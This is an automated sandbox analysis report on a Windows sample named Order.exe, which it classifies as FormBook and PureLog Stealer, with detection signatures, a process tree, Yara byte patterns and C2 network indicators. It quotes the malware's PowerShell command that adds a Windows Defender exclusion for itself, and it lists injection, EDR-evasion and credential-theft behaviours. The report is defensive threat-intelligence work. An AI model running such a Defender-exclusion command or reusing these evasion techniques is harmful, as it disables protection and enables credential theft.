Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order.exe

Overview

General Information

Sample name:Order.exe
Analysis ID:1540817
MD5:879bfdca45455cfe5b122b8ad287b393
SHA1:a348b566aec66df4baa69cfa826d62707c871a4f
SHA256:02253d28e37b943a2d0dbbb8e3a1b53f61d63016e6e12c2ba7f5eb2d5da348b8
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Order.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 879BFDCA45455CFE5B122B8AD287B393)
    • powershell.exe (PID: 4488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2720 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Order.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 879BFDCA45455CFE5B122B8AD287B393)
    • Order.exe (PID: 4544 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 879BFDCA45455CFE5B122B8AD287B393)
      • mkvfHfXifKJWp.exe (PID: 3616 cmdline: "C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mshta.exe (PID: 4340 cmdline: "C:\Windows\SysWOW64\mshta.exe" MD5: 06B02D5C097C7DB1F109749C45F3F505)
          • mkvfHfXifKJWp.exe (PID: 1376 cmdline: "C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7100 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c270:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c270:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x142bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Order.exe.5130000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.Order.exe.3a6a628.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.Order.exe.5130000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.Order.exe.3a55808.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                5.2.Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  Click to see the 5 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order.exe", ParentImage: C:\Users\user\Desktop\Order.exe, ParentProcessId: 6468, ParentProcessName: Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", ProcessId: 4488, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order.exe", ParentImage: C:\Users\user\Desktop\Order.exe, ParentProcessId: 6468, ParentProcessName: Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", ProcessId: 4488, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order.exe", ParentImage: C:\Users\user\Desktop\Order.exe, ParentProcessId: 6468, ParentProcessName: Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe", ProcessId: 4488, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-24T08:01:36.389283+020028554651A Network Trojan was detected192.168.2.44974135.156.117.13180TCP
                  2024-10-24T08:02:00.059415+020028554651A Network Trojan was detected192.168.2.4497523.33.130.19080TCP
                  2024-10-24T08:02:21.866748+020028554651A Network Trojan was detected192.168.2.4498513.33.130.19080TCP
                  2024-10-24T08:02:36.136007+020028554651A Network Trojan was detected192.168.2.449922206.119.82.13480TCP
                  2024-10-24T08:02:50.391000+020028554651A Network Trojan was detected192.168.2.449994162.213.249.21680TCP
                  2024-10-24T08:03:04.071658+020028554651A Network Trojan was detected192.168.2.450027217.160.0.23180TCP
                  2024-10-24T08:03:19.276704+020028554651A Network Trojan was detected192.168.2.45003154.179.173.6080TCP
                  2024-10-24T08:03:33.752288+020028554651A Network Trojan was detected192.168.2.4500353.33.130.19080TCP
                  2024-10-24T08:03:55.854839+020028554651A Network Trojan was detected192.168.2.450039156.226.22.23380TCP
                  2024-10-24T08:04:09.616741+020028554651A Network Trojan was detected192.168.2.45004352.20.84.6280TCP
                  2024-10-24T08:04:23.950321+020028554651A Network Trojan was detected192.168.2.4500473.33.130.19080TCP
                  2024-10-24T08:04:37.964229+020028554651A Network Trojan was detected192.168.2.450051142.250.186.8380TCP
                  2024-10-24T08:04:51.399211+020028554651A Network Trojan was detected192.168.2.450055172.81.61.22480TCP
                  2024-10-24T08:05:04.938835+020028554651A Network Trojan was detected192.168.2.4500593.33.130.19080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-24T08:01:53.136123+020028554641A Network Trojan was detected192.168.2.4497423.33.130.19080TCP
                  2024-10-24T08:01:54.800687+020028554641A Network Trojan was detected192.168.2.4497433.33.130.19080TCP
                  2024-10-24T08:01:57.357112+020028554641A Network Trojan was detected192.168.2.4497463.33.130.19080TCP
                  2024-10-24T08:02:14.222615+020028554641A Network Trojan was detected192.168.2.4498083.33.130.19080TCP
                  2024-10-24T08:02:16.748286+020028554641A Network Trojan was detected192.168.2.4498243.33.130.19080TCP
                  2024-10-24T08:02:19.405720+020028554641A Network Trojan was detected192.168.2.4498403.33.130.19080TCP
                  2024-10-24T08:02:28.495447+020028554641A Network Trojan was detected192.168.2.449881206.119.82.13480TCP
                  2024-10-24T08:02:31.026603+020028554641A Network Trojan was detected192.168.2.449893206.119.82.13480TCP
                  2024-10-24T08:02:33.589134+020028554641A Network Trojan was detected192.168.2.449909206.119.82.13480TCP
                  2024-10-24T08:02:42.042625+020028554641A Network Trojan was detected192.168.2.449956162.213.249.21680TCP
                  2024-10-24T08:02:44.605479+020028554641A Network Trojan was detected192.168.2.449967162.213.249.21680TCP
                  2024-10-24T08:02:47.847054+020028554641A Network Trojan was detected192.168.2.449978162.213.249.21680TCP
                  2024-10-24T08:02:56.397433+020028554641A Network Trojan was detected192.168.2.450024217.160.0.23180TCP
                  2024-10-24T08:02:58.870386+020028554641A Network Trojan was detected192.168.2.450025217.160.0.23180TCP
                  2024-10-24T08:03:01.433060+020028554641A Network Trojan was detected192.168.2.450026217.160.0.23180TCP
                  2024-10-24T08:03:10.911969+020028554641A Network Trojan was detected192.168.2.45002854.179.173.6080TCP
                  2024-10-24T08:03:13.448531+020028554641A Network Trojan was detected192.168.2.45002954.179.173.6080TCP
                  2024-10-24T08:03:16.745453+020028554641A Network Trojan was detected192.168.2.45003054.179.173.6080TCP
                  2024-10-24T08:03:25.997357+020028554641A Network Trojan was detected192.168.2.4500323.33.130.19080TCP
                  2024-10-24T08:03:27.648222+020028554641A Network Trojan was detected192.168.2.4500333.33.130.19080TCP
                  2024-10-24T08:03:31.365939+020028554641A Network Trojan was detected192.168.2.4500343.33.130.19080TCP
                  2024-10-24T08:03:48.262622+020028554641A Network Trojan was detected192.168.2.450036156.226.22.23380TCP
                  2024-10-24T08:03:50.762469+020028554641A Network Trojan was detected192.168.2.450037156.226.22.23380TCP
                  2024-10-24T08:03:53.453728+020028554641A Network Trojan was detected192.168.2.450038156.226.22.23380TCP
                  2024-10-24T08:04:01.903301+020028554641A Network Trojan was detected192.168.2.45004052.20.84.6280TCP
                  2024-10-24T08:04:04.442206+020028554641A Network Trojan was detected192.168.2.45004152.20.84.6280TCP
                  2024-10-24T08:04:07.013442+020028554641A Network Trojan was detected192.168.2.45004252.20.84.6280TCP
                  2024-10-24T08:04:15.293628+020028554641A Network Trojan was detected192.168.2.4500443.33.130.19080TCP
                  2024-10-24T08:04:18.730659+020028554641A Network Trojan was detected192.168.2.4500453.33.130.19080TCP
                  2024-10-24T08:04:21.276828+020028554641A Network Trojan was detected192.168.2.4500463.33.130.19080TCP
                  2024-10-24T08:04:30.292422+020028554641A Network Trojan was detected192.168.2.450048142.250.186.8380TCP
                  2024-10-24T08:04:32.886050+020028554641A Network Trojan was detected192.168.2.450049142.250.186.8380TCP
                  2024-10-24T08:04:35.417323+020028554641A Network Trojan was detected192.168.2.450050142.250.186.8380TCP
                  2024-10-24T08:04:43.597788+020028554641A Network Trojan was detected192.168.2.450052172.81.61.22480TCP
                  2024-10-24T08:04:46.153041+020028554641A Network Trojan was detected192.168.2.450053172.81.61.22480TCP
                  2024-10-24T08:04:48.861760+020028554641A Network Trojan was detected192.168.2.450054172.81.61.22480TCP
                  2024-10-24T08:04:57.080718+020028554641A Network Trojan was detected192.168.2.4500563.33.130.19080TCP
                  2024-10-24T08:05:00.514602+020028554641A Network Trojan was detected192.168.2.4500573.33.130.19080TCP
                  2024-10-24T08:05:02.190581+020028554641A Network Trojan was detected192.168.2.4500583.33.130.19080TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: Order.exeReversingLabs: Detection: 65%
                  Source: Order.exeVirustotal: Detection: 49%Perma Link
                  Yara detected FormBook
                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: Order.exeJoe Sandbox ML: detected
                  Source: Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mshta.pdbGCTL source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143627822.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mkvfHfXifKJWp.exe, 00000007.00000000.1815210984.00000000007DE000.00000002.00000001.01000000.0000000C.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000000.1972533286.00000000007DE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Order.exe, 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1906741465.0000000003765000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1904803243.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: Order.exe, Order.exe, 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1906741465.0000000003765000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1904803243.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: qwhy.pdb source: Order.exe
                  Source: Binary string: qwhy.pdbSHA256 source: Order.exe
                  Source: Binary string: mshta.pdb source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143627822.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B9C6D0 FindFirstFileW,FindNextFileW,FindClose,9_2_00B9C6D0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then xor eax, eax9_2_00B89BB0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then mov ebx, 00000004h9_2_037604E8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49824 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 35.156.117.131:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49893 -> 206.119.82.134:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49851 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49881 -> 206.119.82.134:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49840 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49922 -> 206.119.82.134:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49956 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49909 -> 206.119.82.134:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49978 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49752 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 54.179.173.60:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 172.81.61.224:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 156.226.22.233:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 217.160.0.231:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 52.20.84.62:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 172.81.61.224:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 217.160.0.231:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 54.179.173.60:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 172.81.61.224:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 52.20.84.62:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 156.226.22.233:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 54.179.173.60:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 142.250.186.83:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 217.160.0.231:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 142.250.186.83:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 54.179.173.60:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 142.250.186.83:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49994 -> 162.213.249.216:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 142.250.186.83:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 52.20.84.62:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 52.20.84.62:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 156.226.22.233:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 156.226.22.233:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 172.81.61.224:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 217.160.0.231:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 3.33.130.190:80
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: www.vasehub.xyz
                  Source: DNS query: www.moritynomxd.xyz
                  Source: Joe Sandbox ViewIP Address: 52.20.84.62 52.20.84.62
                  Source: Joe Sandbox ViewIP Address: 35.156.117.131 35.156.117.131
                  Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                  Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
                  Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                  Source: Joe Sandbox ViewASN Name: AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
